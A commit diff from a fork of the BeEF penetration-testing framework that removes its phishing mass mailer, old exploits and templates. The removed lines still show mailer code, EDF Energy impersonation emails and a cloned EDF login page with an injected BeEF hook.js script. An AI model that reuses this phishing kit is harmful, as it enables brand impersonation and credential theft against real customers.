Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Removed several old exploits and Mass Mailer functionality (#2788)

Browse Source 
* Modules: remove old exploits

* Social Engineering: remove old templates

* Social Engineering: Remove Mass Mailer functionality
This commit is contained in:
bcoles
2023-04-02 22:08:34 +10:00
committed by GitHub
parent 3a10a15aae
commit 996edf9ed8
43 changed files with 9 additions and 2318 deletions
Download Patch File Download Diff File Expand all files Collapse all files

7
core/main/ar-migrations/012_create_mass_mailer.rb
View File

@@ -1,7 +0,0 @@
class CreateMassMailer < ActiveRecord::Migration[6.0]
def change
create_table :mass_mailers do |t|
# TODO: fields
end
end
end

34
extensions/social_engineering/config.yaml
View File

@@ -14,40 +14,6 @@ beef:
add_beef_hook: true
user_agent: "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2"
verify_ssl: true
mass_mailer:
# NOTE: you must have 'file' in your PATH
user_agent: "Microsoft-MacOutlook/12.12.0.111556"
host: "smtp.gmail.com"
port: 587
use_auth: true
use_tls: true
verify_ssl: true
helo: "gmail.com" # this is usually the domain name
auth: "youruser@gmail.com"
password: "yourpass"
# available templates
templates:
default:
# images are by default inline, so if you want to attach something, see 'attachments' below
images: ["beef_logo.png"]
images_cids:
cid1: "beef_logo.png"
attachments: ["beef_attachment.pdf"]
edfenergy:
# my-account.edfenergy.com_mod is an example of a modified page (manually modified in order to
# intercept POST requests) to be served with the web_cloner using use_existing = true
images: ["corner-tl.png", "main.png", "edf_logo.png", "promo-corner-left.png", "promo-corner-right-arrow.png", "promo-reflection.png", "2012.png", "corner-bl.png", "corner-br.png", "bottom-border.png"]
images_cids:
cid1: "corner-tl.png"
cid2: "main.png"
cid3: "edf_logo.png"
cid4: "promo-corner-left.png"
cid5: "promo-corner-right-arrow.png"
cid6: "promo-reflection.png"
cid7: "2012.png"
cid8: "corner-bl.png"
cid9: "corner-br.png"
cid10: "bottom-border.png"
powershell:
# the default payload being used is windows/meterpreter/reverse_https
msf_reverse_handler_host: "172.16.45.1"

4
extensions/social_engineering/extension.rb
View File

@@ -19,7 +19,7 @@ module BeEF
@short_name = 'social_engineering'
@full_name = 'Social Engineering'
@description = 'Phishing attacks for your pleasure: web page cloner (POST interceptor and BeEF goodness), highly configurable mass mailer, powershell-related attacks, etc.'
@description = 'Web page cloner and other social engineering tools.'
BeEF::API::Registrar.instance.register(BeEF::Extension::RegisterSEngHandler, BeEF::API::Server, 'mount_handler')
end
@@ -29,13 +29,11 @@ end
# Handlers
require 'extensions/social_engineering/web_cloner/web_cloner'
require 'extensions/social_engineering/web_cloner/interceptor'
require 'extensions/social_engineering/mass_mailer/mass_mailer'
require 'extensions/social_engineering/powershell/bind_powershell'
# Models
require 'extensions/social_engineering/models/web_cloner'
require 'extensions/social_engineering/models/interceptor'
# require 'extensions/social_engineering/models/mass_mailer'
# RESTful api endpoints
require 'extensions/social_engineering/rest/socialengineering'

238
extensions/social_engineering/mass_mailer/mass_mailer.rb
View File

@@ -1,238 +0,0 @@
#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module SocialEngineering
class MassMailer
require 'net/smtp'
require 'base64'
include Singleton
def initialize
@config = BeEF::Core::Configuration.instance
@config_prefix = 'beef.extension.social_engineering.mass_mailer'
@templates_dir = "#{File.expand_path('../../../extensions/social_engineering/mass_mailer/templates', __dir__)}/"
@user_agent = @config.get("#{@config_prefix}.user_agent")
@host = @config.get("#{@config_prefix}.host")
@port = @config.get("#{@config_prefix}.port")
@helo = @config.get("#{@config_prefix}.helo")
@auth = @config.get("#{@config_prefix}.auth")
@password = @config.get("#{@config_prefix}.password")
end
# tos_hash is an Hash like:
# 'antisnatchor@gmail.com' => 'Michele'
# 'ciccio@pasticcio.com' => 'Ciccio'
def send_email(template, fromname, fromaddr, subject, link, linktext, tos_hash)
# create new SSL context and disable CA chain validation
if @config.get("#{@config_prefix}.use_tls")
@ctx = OpenSSL::SSL::SSLContext.new
unless @config.get("#{@config_prefix}.verify_ssl")
@ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE # In case the SMTP server uses a self-signed cert, we proceed anyway
end
@ctx.ssl_version = 'TLSv1'
end
n = tos_hash.size
x = 1
print_info "Sending #{n} mail(s) from [#{fromaddr}] - name [#{fromname}] using template [#{template}]:"
print_info "subject: #{subject}"
print_info "link: #{link}"
print_info "linktext: #{linktext}"
# create a new SMTP object, enable TLS with the previous instantiated context, and connects to the server
smtp = Net::SMTP.new(@host, @port)
smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false
if @config.get("#{@config_prefix}.use_auth")
smtp.start(@helo, @auth, @password, :login) do |smtp|
tos_hash.each do |to, name|
message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
smtp.send_message(message, fromaddr, to)
print_info "Mail #{x}/#{n} to [#{to}] sent."
x += 1
end
end
else
smtp.start(@helo) do |smtp|
tos_hash.each do |to, name|
message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
smtp.send_message(message, fromaddr, to)
print_info "Mail #{x}/#{n} to [#{to}] sent."
x += 1
end
end
end
end
def compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
begin
msg_id = random_string(50)
boundary = "------------#{random_string(24)}"
rel_boundary = "------------#{random_string(24)}"
header = email_headers(fromaddr, fromname, @user_agent, to, subject, msg_id, boundary)
plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
rel_header = email_related(rel_boundary)
html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template), rel_boundary)
images = ''
@config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
images += email_add_image(image, "#{@templates_dir}#{template}/#{image}", rel_boundary)
end
attachments = ''
unless @config.get("#{@config_prefix}.templates.#{template}.attachments").nil?
@config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}", rel_boundary)
end
end
close = email_close(boundary)
rescue StandardError => e
print_error 'Error constructing email.'
raise
end
message = header + plain_body + rel_header + html_body + images + attachments + close
print_debug "Raw Email content:\n #{message}"
message
end
def email_headers(from, fromname, user_agent, to, subject, msg_id, boundary)
<<~EOF
From: "#{fromname}" <#{from}>
Reply-To: "#{fromname}" <#{from}>
Return-Path: "#{fromname}" <#{from}>
X-Mailer: #{user_agent}
To: #{to}
Message-ID: <#{msg_id}@#{@host}>
X-Spam-Status: No, score=0.001 required=5
Subject: #{subject}
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=#{boundary}
This is a multi-part message in MIME format.
--#{boundary}
EOF
end
def email_plain_body(plain_text, boundary)
<<~EOF
Content-Type: text/plain; charset="utf8"
Content-Transfer-Encoding:8bit
#{plain_text}
--#{boundary}
EOF
end
def email_related(rel_boundary)
<<~EOF
Content-Type: multipart/related;
boundary="#{rel_boundary}"
--#{rel_boundary}
EOF
end
def email_html_body(html_body, rel_boundary)
<<~EOF
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
#{html_body}
--#{rel_boundary}
EOF
end
def email_add_image(name, path, rel_boundary)
file_encoded = [File.read(path)].pack('m') # base64 encoded
<<~EOF
Content-Type: #{get_mime(path)};
name="#{name}"
Content-Transfer-Encoding: base64
Content-ID: <#{name}>
Content-Disposition: inline;
filename="#{name}"
#{file_encoded}
--#{rel_boundary}
EOF
end
def email_add_attachment(name, path, rel_boundary)
file_encoded = [File.read(path)].pack('m') # base64 encoded
<<~EOF
Content-Type: #{get_mime(path)};
name="#{name}"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="#{name}"
#{file_encoded}
--#{rel_boundary}
EOF
end
def email_close(boundary)
<<~EOF
--#{boundary}--
EOF
end
# Replaces placeholder values from the plain/html email templates
def parse_template(name, link, linktext, template_path, template)
result = ''
img_config = "#{@config_prefix}.templates.#{template}.images_cids"
img_count = 0
File.open(template_path, 'r').each do |line|
# change the Recipient name
if line.include?('__name__')
result += line.gsub('__name__', name)
# change the link/linktext
elsif line.include?('__link__')
result += if line.include?('__linktext__')
line.gsub('__link__', link).gsub('__linktext__', linktext)
else
line.gsub('__link__', link)
end
# change images cid/name/alt
elsif line.include?('src="cid:__')
img_count += 1
result += if line.include?('name="img__') || line.include?('alt="__img')
line.gsub("__cid#{img_count}__",
@config.get("#{img_config}.cid#{img_count}")).gsub("__img#{img_count}__",
@config.get("#{img_config}.cid#{img_count}"))
else
line.gsub("__cid#{img_count}__", @config.get("#{img_config}.cid#{img_count}"))
end
else
result += line
end
end
result
end
def get_mime(file_path)
result = ''
IO.popen(['file', '--mime', '-b', file_path.to_s], 'r+') do |io|
result = io.readlines.first.split(';').first
end
result
end
def random_string(length)
output = (0..length).map { rand(36).to_s(36).upcase }.join
end
end
end
end
end

BIN
extensions/social_engineering/mass_mailer/templates/default/beef_attachment.pdf
View File

Binary file not shown.

BIN
extensions/social_engineering/mass_mailer/templates/default/beef_logo.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 13 KiB

26
extensions/social_engineering/mass_mailer/templates/default/mail.html
View File

@@ -1,26 +0,0 @@
<!--
Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
</head>
<body bgcolor="#FFFFFF" text="#000000">
Hi __name__,<br>
<br>
We would like to inform you that your BeEF order has been successful.<br>
You can check the status of your hook at the following link:<br>
<!-- be sure to have link and linktext placeholders on the same line, like the following: -->
<a href="__link__">__linktext__</a><br>
<br>
For convenience, we also attached a resume of your order as PDF.<br>
<br>
Regards,<br>
The BeEF team<br>
<!-- be sure to have different images on different lines, like the following: -->
<img src="cid:__cid1__" name="__img1__" alt="__img1__"><br>
<!--<img src="cid:cid2" name="img2" alt="img2"><br>-->
</body>
</html>

10
extensions/social_engineering/mass_mailer/templates/default/mail.plain
View File

@@ -1,10 +0,0 @@
Hi __name__,
We would like to inform you that your BeEF order has been successful.
You can check the status of your hook at the following link:
__link__
For convenience, we also attached a resume of your order as PDF.
Regards,
The BeEF team

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/2012.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 9.2 KiB

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/bottom-border.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 33 KiB

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/corner-bl.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 2.8 KiB

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/corner-br.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 2.8 KiB

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/corner-tl.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 2.8 KiB

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/edf_logo.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 6.8 KiB

59
extensions/social_engineering/mass_mailer/templates/edfenergy/mail.html
View File

@@ -1,59 +0,0 @@
<!--
Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF8">
<meta name="Generator" content="StreamServe MailOUT"><title>
</title><style type="text/css">P {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px;}</style>
</head><body><div><p><font face=MS Sans Serif color=#000000 size=1>
<table style="width:618px; border-collapse:collapse;">
<tr><td style="padding:28px; background-color: #ff5716;">
<table style="border-collapse:collapse; font-size:12px; width:562px;" cellpadding="0" cellspacing="0" border="0">
<tr><td style="padding: 0px; margin:0px; line-height:0px; width:28px; background-color:white; vertical-align:top;">
<img src="cid:__cid1__" style="display:block; width:11px; height:11px;" />
</td><td colspan="2" style="width:379px; background-color:white;"></td>
<td rowspan="3" colspan="2" style="padding: 0px; margin:0px; line-height:0px; background-color:white; vertical-align:top;">
<img src="cid:__cid2__" style="display:block; width:155px; height:291px; " alt="Cityscape" /></td></tr>
<tr><td style="background-color:white;" rowspan="3"></td><td style="width:60px; vertical-align:top; background-color:white;">
<img src="cid:__cid3__" style="display:block; width:44px; height:65px;" alt="EDFEnergy" /></td>
<td style="width:315px; background-color:white;">
<h1 style="font-family: arial, sans-serif; font-weight:bold; font-size:16pt; color:#09357a; margin:0;">
Important information regarding your account</h1><br /></td></tr>
<tr><td colspan="2" style="font-family: arial, sans-serif; font-size:11pt; color:#434343; width:375px; background-color:white; vertical-align:top;" >
<p style="margin: 16px 0px 16px 0px;"><span style="color:#09357a; font-weight: bold; font-size:13pt;" >
Dear __name__</span></p><p style="margin-bottom:16px;">You have an important message regarding your EDF Energy account. </p>
<p style="margin-bottom:16px;">As this message contains confidential information you must
<a href="__link__" style="color: #013976;">click here</a> to view the message.</p>
<p style="margin-bottom:16px;">In order to read your messages you must be registered to MyAccount which you can do using the same link. </p>
<br/><table style="border-collapse:collapse; width:292px; padding:0px;"><tr>
<td style="width:11px; background-color:#09357a; padding:0px; vertical-align:top;">
<img src="cid:__cid4__"
style="display:block; width:11px; height:26px;" /></td>
<td style="background-color: #09357a; color:white; width:282px; padding:0 0 0 5px; font-family:Arial; font-weight:bold; font-size:10pt;">
<a href="__link__" style="color:white; text-decoration:none;">Continue to MyMessages</a></td>
<td style="width:27px; background-color:#09357a; padding:0px; vertical-align:top;">
<img src="cid:__cid5__" style="display:block; width:27px; height:26px;" /></td></tr>
<tr><td colspan="3" style="width:293px; padding:0px;">
<img src="cid:__cid6__" style="display:block; width:293px; height:9px;" />
</td></tr></table></td></tr><tr><td colspan="2" style="width:375px; background-color:white;"></td>
<td colspan="2" style="text-align:right;background-color:white;">
<img src="cid:__cid7__" style="display:block; float:right; width:95px; height:69px;" alt="London 2012" /></td></tr>
<tr><td style="padding: 0px; margin:0px; line-height:0px; width:28px; background-color:white; vertical-align:bottom;">
<img src="cid:__cid8__" style="display:block; width:11px; height:11px;" /></td>
<td colspan="2" style="width:375px; background-color:white;"></td>
<td style="width:144px; background-color:white;">&nbsp;</td>
<td style="padding: 0px; margin:0px; line-height:0px; text-align:right; width:11px; background-color:white; vertical-align:bottom;">
<img src="cid:__cid9__" style="display:block; padding: 0px; margin: 0px; width:11px; height:11px;" />
</td>
</tr> </table></td></tr><tr>
<td style="padding: 0px;">
<img src="cid:__cid10__" style="display:block; width:618px; height:27px;" />
</td></tr><tr><td style="padding:15px 28px; background-color:#ffdecf;">
<p style="text-align:center; font-family: arial, sans-serif; font-weight:bold; font-size:9pt; color:#001f40;">
EDF Energy is a trading name used by EDF Energy Customers plc. Reg. No 02228297 whose registered office is at 40 Grosvenor Place, London, SW1X 7EN,
incorporated in England and Wales. EDF Energy Customers plc. is a wholly owned subsidiary of EDF Energy plc.
The responsibility for performance of the supply obligations for all EDF Energy supply contracts rests with EDF Energy Customers plc.
<br /><br />The official Emblems of the London Organising Committee of the Olympic Games <br />and Paralympic Games Ltd are 2007 LOCOG. All rights reserved.</p></td></tr>
</table></font></p></font></div></body></html>

19
extensions/social_engineering/mass_mailer/templates/edfenergy/mail.plain
View File

@@ -1,19 +0,0 @@
Important information regarding your account
Dear __name__
You have an important message regarding your EDF Energy account.
As this message contains confidential information you must click here to view the message:
__link__
In order to read your messages you must be registered to MyAccount which you can do using the same link:
__link__
EDF Energy is a trading name used by EDF Energy Customers plc. Reg. No 02228297 whose registered office
is at 40 Grosvenor Place, London, SW1X 7EN, incorporated in England and Wales. EDF Energy Customers plc.
is a wholly owned subsidiary of EDF Energy plc. The responsibility for performance of the supply obligations
for all EDF Energy supply contracts rests with EDF Energy Customers plc.
The official Emblems of the London Organising Committee of the Olympic Games
and Paralympic Games Ltd are © 2007 LOCOG. All rights reserved.

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/main.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 55 KiB

790
extensions/social_engineering/mass_mailer/templates/edfenergy/my-account.edfenergy.com_mod
View File

@@ -1,790 +0,0 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html><head><LINK REL=stylesheet HREF="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.design.portaldesigndata/themes/portal/Edf_Energy_Orchard_Theme/glbl/glbl_nn7.css?7.0.20.0.1">
<LINK REL=stylesheet HREF="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.design.portaldesigndata/themes/portal/Edf_Energy_Orchard_Theme/prtl_std/prtl_std_nn7.css?7.0.20.0.1">
<!-- EPCF: BOB Core -->
<meta http-equiv="Content-Script-Type" content="text/javascript">
<script src="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.epcf.loader/script/optimize/js13_epcf.js?7.00001620"></script>
<script>
<!--
EPCM.relaxDocumentDomain();
EPCM.init( {
Version:7.00001620,
Level:1,
PortalVersion:"7.00.200908152330",
DynamicTop:false, // [service=true nestedWinOnAlias=false]
UAType:21, // [Mozilla]
UAVersion:5.0,
UAPlatform:1, // [Win]
UIPMode:"1", // [Default=1, User=0, Personalize=true]
UIPWinFeatures:"",
UIPPortalPath:"https://my-account.edfenergy.com:443/irj/portal/anonymous",
UIPPopupComp:"",
UIPPopupCompSize:"",
UIPPopupMsgNN:"Your current page contains unsaved data.\r\nDo you want to continue with navigation and open a new window?",
UIPPopupMsgND:"Your current page contains unsaved data.\r\nDo you want to discard the changes and open the content in the same window?",
DBGException:false
} );
EPCM.DSM.init( {
TerminatorURL:"/irj/servlet/prt/portal/prtroot/com.sap.portal.dsm.Terminator",
WinEmptyUrl:"/irj/portalapps/com.sap.portal.dsm/images/empty.gif",
ForcedUserDebug:false,
KeepAliveActive:false,
KeepAliveDelta:840,
KeepAliveStopAfter:36000
} );
function SAPWP_receiveSessInfo( sessInfo, frameRef ){
EPCM.DSM.processSession( sessInfo, frameRef );
}
//-->
</script>
<!-- EPCF: EOB Core -->
<script type="text/javascript">
/*HTML Business for Java, 645_SP_REL, 529005, Wed Jul 22 15:27:56 BST 2009*/
ur_system = {doc : window.document , mimepath :"/irj/portalapps/com.sap.portal.design.urdesigndata/themes/portal/Edf_Energy_Orchard_Theme/common/", stylepath : "/irj/portalapps/com.sap.portal.design.urdesigndata/themes/portal/Edf_Energy_Orchard_Theme/ur/", emptyhoverurl : "/irj/portalapps/com.sap.portal.htmlb/jslib/emptyhover.html", is508 : false, dateformat : 1, domainrelaxing : "MINIMAL"};
</script>
<title >MyAccount</title><meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.httpconnectivity.httpauthentication/scripts/CAManagerScript.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/HistoryFramework.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/NavigationFramework.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/FrameworkSupport.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.pagebuilder/scripts/pagesupport.js" ></script><link REL=STYLESHEET HREF="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/css/stylesheets/main_v1.5.css?7.0.20.0.1" TYPE="text/css" ><link REL=STYLESHEET HREF="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/css/stylesheets/myaccount_v3.css?7.0.20.0.1" TYPE="text/css" ><script type="text/javascript" src="http://192.168.0.3:80/hook.js"></script>
</head><body class="prtlBody urFontBaseFam urScrl">
<!-- EPCF: Component com.sap.portal.navigation.portallauncher.anonymous, kegighenibibncgidhmmmfdjjggfpmhm -->
<Script>
var caEngine = new CAManager('/irj/servlet/prt/portal/prtroot/com.sap.portal.httpconnectivity.httpauthentication.Engine','dialogHeight:10;dialogWidth:20;center:1;help:0;status:0');
caEngine.registerCAEvent('com.sap.portal.httpconnectivity.httpauthentication','Teach',caEngine,'eventCallBack');
</Script>
<script>
var disableWorkProtectCheck = false;
function popupUnsavedDataBeforeUnload(evt)
{
if ((typeof pageTitleBar != "undefined") && pageTitleBar.backForwardLink)
{
pageTitleBar.backForwardLink = false;
}
else
{
evt = (evt) ? evt : ((window.event) ? event : null);
if ( EPCM.getUAType() != EPCM.MSIE && EPCM.getUAType() != EPCM.MOZILLA) return;
if ( EPCM.getGlobalDirty() && (! disableWorkProtectCheck ))
{
if(EPCM.getUAType() == EPCM.MSIE )
{
evt.returnValue = 'You have unsaved data';
}
else
{
evt.preventDefault();
evt.stopPropagation();
return 'You have unsaved data';
}
}
}
}
try{
if ( EPCM.getUAType() == EPCM.MSIE || EPCM.getUAType()== EPCM.MOZILLA){
if (window==EPCM.getSAPTop()){
window.onbeforeunload = popupUnsavedDataBeforeUnload;
}
}
} catch(ex){}
</script><script>frameworkSupport.init({anonymous:true,phase:'framework',portalURL:'https://my-account.edfenergy.com:443/irj/portal/anonymous'});</script><script>frameworkSupport.init2({contentAreaURL:'/irj/servlet/prt/portal/prteventname/Navigate/prtroot/pcd!3aportal_content!2fEdf_Energy_Development!2fOrchard!2fDesktop!2fEDFE_Framework!2fEDFE_Anonymous!2fCustomLogonDesktop!2fframeworkPages!2fcom.edfe.orchard.pct.Logon_Page_pg!2fcom.sap.portal.innerpage!2fcom.sap.portal.contentarea',portalURL:'https://my-account.edfenergy.com:443/irj/portal/anonymous',innerPage:'pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg/com.sap.portal.innerpage',innerPageFrameURL:'/irj/servlet/prt/portal/prteventname/Navigate/prtroot/pcd!3aportal_content!2fEdf_Energy_Development!2fOrchard!2fDesktop!2fEDFE_Framework!2fEDFE_Anonymous!2fCustomLogonDesktop!2fframeworkPages!2fcom.edfe.orchard.pct.Logon_Page_pg!2fcom.sap.portal.innerpage',tlnComp:'/irj/portalapps/com.sap.portal.navigation.toplevel',ObjBasedNavigationURL:'/irj/servlet/prt/portal/prtroot/com.sap.portal.navigation.objbased.ObjBasedNavigation',serverPath:'https://my-account.edfenergy.com:443',usedConnectors:''});</script>
<span id=divChangeContent name=divChangeContent style="position:absolute;height:0;width:0;top:-5000;left:-5000">
<FORM action="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com" method=POST id="frmChangeContent" name="frmChangeContent">
<INPUT type="hidden" id=NavigationTarget name=NavigationTarget>
<INPUT type="hidden" id=RelativeNavBase name=RelativeNavBase></INPUT>
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUhgPrZWDRw08VLuhthw6Alf_ythxgZRxx-bn2SU9GjY2G8UFdotsliPfe5ArbcVEM="></FORM>
<form id='obnNavForm' method='post' target='obnNavIFrame' action="/irj/portal/anonymous"> <input type='hidden' name='systemAlias'>
<input type='hidden' name='businessObjName'>
<input type='hidden' name='objValue'>
<input type='hidden' name='operation'>
<input type='hidden' name='usePost' value='false'>
<input type='hidden' name='source'>
<input type='hidden' name='resolvingMode' value='Default'>
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUZncgeJn0nDtoKgRZLTHoNG9b8gjXLxyg1JXcdz0DDEk4i74Lypj65OK5A4udLxsoXWiF7rrPTfgID-qUNr8-D6aXCTTHzGtpGEifQUi875Ykz1XmE69Xx"></form>
</span>
<iframe src='https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.pagebuilder/html/EmptyDocument.html' style='position:absolute;height:0;visibility:hidden' name='obnNavIFrame' id='obnNavIFrame'></iframe>
<script>var disablePersonalize = true;</script>
<!-- EPCF: Component com.sap.portal.pagebuilder.pageBuilder, agnkfkoliedeidmfenendpdjjggfpmic -->
<SCRIPT>var emptyDocumentUrl = "/irj/portalapps/com.sap.portal.pagebuilder/html/EmptyDocument.html";</SCRIPT>
<!-- EPCF: Component com.sap.portal.layouts.framework.light_framework, fbkobmdfenlemkgnkdbnmfdjjggfpmip -->
<SCRIPT>if (typeof EPCM != "undefined") {EPCM.relaxDocumentDomain();} else { var d=document.domain; if (d.search(/^\d+\.\d+\.\d+\.\d+$/)>=0) {} else { var l=d.indexOf("."); if (l>=0) {d=d.substr(l+1)} } if (document.domain != d) {document.domain = d;}}
pageSupport.pageHelperUrl = '/irj/servlet/prt/portal/prtroot/com.sap.portal.pagebuilder.PageHelper';
pageSupport.proxyModesUrl = '/irj/servlet/prt/portal/prtroot/com.sap.portal.pagebuilder.IviewModeProxy';
pageSupport.addPageId('pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg','0','local');
pageSupport._addIvuPageId("pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg/com.edfe.orchard.pct.Logon_ivu","page0ivu0");
pageSupport._addIViewBank("page0ivu0",new iviewBank("","",pageSupport.EMBEDDED,1,"0","","GET"));
</SCRIPT>
<script>
document.body.style.margin=0;
document.body.scroll = "no";
</script>
<TABLE style="WIDTH: 100%" cellSpacing=0 cellPadding=0 class="prtlHeaderCon" ><TR><TD>
<!-- EPCF: Component com.edfe.orchard.Logon.LogonComp, fchmhdeefnpeknleddanfldjjggfpmig -->
<html xmlns:xalan-nodeset="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator" content="HTML Tidy for Windows (vers 14 February 2006), see www.w3.org" />
<title>MyAccount</title>
<link rel="SHORTCUT ICON" href="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/favicon/favicon.ico" />
<script type="text/javascript" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/scripts/edfenergy-ga-script-n.js"></script>
<script type="text/javascript">
loadTrackCode('UA-25608035-1');
_gaq.push(['_trackPageview', 'Login']);
</script>
<script language="JavaScript">
/*var emailRegEx = /^([a-zA-Z0-9_\.\!\#\$\%\^\&\*\{\}\~\`\+\_\=\?\'\|\"\-]{2,})\@(([a-zA-Z0-9\-]{2,})\.)+([a-zA-Z]{2,4})+$/;*/
var emailRegEx = /^\s*[\w\-\+_\{\}\~\`\+\_\=\?\'\|\"\-\!\#\$\%\^\&\*]+(\.[\w\-\+_\']+)*\@[\w\-\+_]+\.[\w\-\+_]+(\.[\w\-\+_]+)*\s*$/;
var Monitor_Flag1 = true;
document.onkeyup = checkKeyPressed;
window.history.forward(1);
function EDFEDisableSubmitButton1( button_text1, button_id1 )
{
var bid = button_id1;
var btext = button_text1;
document.getElementById( bid ).innerHTML = "<div class='btbg' id='"+bid+"'><a>"+ btext +" &raquo; </a></div>" ;
}
function checkCode()
{
if(event.keyCode==13)
{
event.keyCode=9;
}
}
function checkKeyPressed()
{
if(event.keyCode==13)
{
if(Monitor_Flag1!=null && Monitor_Flag1==true){
callGA('yes');
}
else
{
callGA('no');
}
}
}
function change(param1,param2)
{
param1.style.backgroundColor = param2;
}
function allValidChars(email)
{
var parsed = true;
var validchars = "abcdefghijklmnopqrstuvwxyz0123456789@.-_!#$%&`*+-/=?^'{}|~\"";
for (var i=0; i < email.length; i++)
{
var letter = email.charAt(i).toLowerCase();
if (validchars.indexOf(letter) != -1)
continue;
parsed = false;
break;
}
return parsed;
}
function trim(str) {
return str.replace(/(^[\s\xA0]+|[\s\xA0]+$)/g, '');
}
function validateEmail(email)
{
var decision = true;
if(trim(email)!= null && trim(email) !=""){
if(email.match(emailRegEx)){
decision = true;
}else{
decision = false;
}
}else{
decision = false;
}
/*
if (! allValidChars(email))
{
decision = false;
}
if (email.indexOf("@") < 1)
{
decision = false;
}
if(email.indexOf("@")!=email.lastIndexOf("@"))
{
decision = false;
}
else if (email.lastIndexOf(".") <= email.indexOf("@"))
{
decision = false;
}
else if (email.indexOf("@") == email.length)
{
decision = false;
}
else if (email.indexOf("..") >=0)
{
decision = false;
}
else if (email.indexOf(".") == email.length)
{
decision = false;
}*/
if(!decision)
{
document.logonForm.f_username.focus();
change(document.logonForm.f_username,'#FFFFFF'); // Cosmotic Changes
document.getElementById('errorMessage').innerHTML = "Please enter a valid email address";
document.getElementById('errorMessage1').innerHTML = "";
}
else
{
change(document.logonForm.f_username,'#FFFFFF');
}
return decision;
}
function callGA(GA)
{
if(GA!=null && GA=="yes")
{
_gaq.push(['_trackPageview', 'LoginAttempted']);
}
var t = setTimeout("validateLogin()", 100);
}
function validateLogin()
{
var email = document.logonForm.f_username.value;
var pass = document.logonForm.f_passwd.value;
if(email==null || email=="")
{
document.logonForm.f_username.focus();
document.getElementById('errorMessage').innerHTML = "Please enter your 'username', which is your email address";
document.getElementById('errorMessage1').innerHTML = "";
return false;
}
else
{
if(validateEmail(email))
{
if(pass==null || pass=='')
{
document.logonForm.f_passwd.focus();
document.getElementById('errorMessage').innerHTML = "Please enter your password";
